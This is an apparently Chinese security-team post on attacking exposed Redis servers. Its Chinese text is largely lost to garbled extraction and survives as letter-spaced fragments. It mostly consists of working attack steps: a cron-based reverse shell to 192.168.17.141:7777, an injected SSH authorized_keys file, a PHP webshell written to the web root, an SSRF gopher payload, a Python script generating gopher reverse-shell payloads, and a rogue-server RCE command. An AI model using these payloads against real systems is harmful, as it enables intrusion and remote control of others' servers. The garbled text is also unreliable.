[20434] 2020-12-29_Redis攻防

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-12-29_Redis攻防 R e d i s K h a n   2 0 2 0 - 1 2 - 2 9 P t T e a m   z e r o     r e d i s     r e d i s     r e d i s   广 r e d i s 6 3 7 9 r e d i s 广 使 s h e l l r e d i s s s h r e d i s w e b w e b s h e l l s s r f r e d i s s h e l l R e d i s R E C R e d i s s h e l l r e d i s r o o t c r o n t a b s h e l l 1 .   2 .   r e d i s 访 / 3 .   p r o t e c t e d - m o d e 访 r e d i s s u c c e e d P t T e a m   . P t - T e a m w e b k e y   x x s h e l l c r o n t a b s h e l l s e t     x x       " n *   *   *   *   *   b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 1 7 . 1 4 1 / 7 7 7 7   0 > & 1 n " l i n u x c o n f i g   s e t   d i r   / v a r / s p o o l / c r o n /   r o o t c o n f i g   s e t   d b f i l e n a m e   r o o t r o o t s a v e
r e d i s s s h R e d i s r o o t r o o t S S H S S H 1 .   2 .   R e d i s 使 R O O T 3 .   R e d i s 访 / 4 .   p r o t e c t e d - m o d e 5 .   S S H 使 s s h k e y R e d i s k e y   x x R e d i s k e y   x x s s h s u c c e e d R e d i s w e b w e b s h e l l r e d i s w e b r e d i s w e b w e b w e b s h e l l s s h - k e y g e n   - t   r s a ( e c h o   - e   " n n " ;   c a t   i d _ r s a . p u b ; e c h o   - e   " n n " )   >   k e y . t x t - - p a s s c a t   k e y . t x t   |   r e d i s - c l i   - h   1 9 2 . 1 6 8 . 0 . 1 0 8   - - p a s s   p a s s 1 2 3   - x   s e t   x x g o p h e r s h e l l c o n f i g   s e t   d i r   / r o o t / . s s h c o n f i g   s e t   d b f i l e n a m e   a u t h o r i z e d _ k e y s S a v e
s s r f r e d i s s h e l l s s r f 7 0 0 1 7 0 0 1 r e d i s W e b l o g i c S S R F G E T % 0 a % 0 d r e d i s S S R F r e d i s s u c c e e d g o p h e r s h e l l >   c o n f i g   s e t   d i r   / v a r / w w w / h t m l / >   c o n f i g   s e t   d b f i l e n a m e   s h e l l . p h p k e y   x >   s e t   x   " < ? p h p   p h p i n f o ( ) ; ? > " >   s a v e P a y l o a d h t t p : / / 1 7 2 . 1 9 . 0 . 2 : 6 3 7 9 / t e s t % 0 D % 0 A % 0 D % 0 A s e t % 2 0 1 % 2 0 % 2 2 % 5 C n % 5 C n % 5 C n % 5 C n 0 - 5 9 % 2 0 0 - 2 3 % 2 0 1 - 3 1 % 2 0 1 - 1 2 % 2 0 0 - 6 % 2 0 r o o t % 2 0 b a s h % 2 0 - c % 2 0 % 2 7 s h % 2 0 - i % 2 0 % 3 E % 2 6 % 2 0 % 2 F d e v % 2 F t c p % 2 F 1 9 2 . 1 6 8 . 1 7 . 1 4 1 % 2 / * g o p h e r s h e l l * / i m p o r t   u r l l i b p r o t o c o l = " g o p h e r : / / " i p = " 1 7 2 . 1 8 . 0 . 2 "
R e d i s R E C R e i d s 4 . x R e d i s R e d i s R e d i s C . s o 使 r e d i s 1 .   R e d i s 访 / 2 .   p r o t e c t e d - m o d e 3 .   r e d i s   i p 1 9 2 . 1 6 8 . 1 7 . 1 3 8 1 9 2 . 1 6 8 . 1 7 . 1 3 0 h t t p s : / / g i t h u b . c o m / T e s t z e r o - w z / A w s o m e - R e d i s - R o g u e - S e r v e r s u c c e e d R e d i s 1 .   使 R e d i s 2 .   R e d i s 访 3 .   R e d i s p r o t e c t e d - m o d e     4 .   R e d i s r e d i s r e q u i r e p a s s 5 .   R e d i s R e d i s i p = " 1 7 2 . 1 8 . 0 . 2 " p o r t = " 6 3 7 9 " r e v e r s e _ i p = " 1 9 2 . 1 6 8 . 1 7 . 1 4 1 " r e v e r s e _ p o r t = " 7 7 7 7 " c r o n = " n n n n * / 1   *   *   *   *   b a s h   - i   > &   / d e v / t c p / % s / % s   0 > & 1 n n n n " % ( r e v e r s e _ i p , r e v e r s e _ p o r t ) f i l e n a m e = " r o o t " p a t h = " / v a r / s p o o l / c r o n " p a s s w d = " " c m d = [ " f l u s h a l l " ,       " s e t   1   { } " . f o r m a t ( c r o n . r e p l a c e ( "   " , " $ { I F S } " ) ) ,       " c o n f i g   s e t   d i r   { } " . f o r m a t ( p a t h ) ,       " c o n f i g   s e t   d b f i l e n a m e   { } " . f o r m a t ( f i l e n a m e ) ,       " s a v e "       ] i f   p a s s w d :     c m d . i n s e r t ( 0 , " A U T H   { } " . f o r m a t ( p a s s w d ) ) p a y l o a d = p r o t o c o l + i p + " : " + p o r t + " / _ " d e f   r e d i s _ f o r m a t ( a r r ) :     C R L F = " r n "     r e d i s _ a r r   =   a r r . s p l i t ( "   " )     c m d = " "     c m d + = " * " + s t r ( l e n ( r e d i s _ a r r ) )     f o r   x   i n   r e d i s _ a r r :         c m d + = C R L F + " $ " + s t r ( l e n ( ( x . r e p l a c e ( " $ { I F S } " , "   " ) ) ) ) + C R L F + x . r e p l a c e ( " $ { I F S } " , "   " )     c m d + = C R L F     r e t u r n   c m d i f   _ _ n a m e _ _ = = " _ _ m a i n _ _ " :     f o r   x   i n   c m d :         p a y l o a d   + =   u r l l i b . q u o t e ( r e d i s _ f o r m a t ( x ) )     p r i n t   p a y l o a d p y t h o n 3   r e d i s - r o g u e - s e r v e r . p y   - - r h o s t   1 9 2 . 1 6 8 . 1 7 . 1 3 8   - - l h o s t   1 9 2 . 1 6 8 . 1 7 . 1 3 0

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则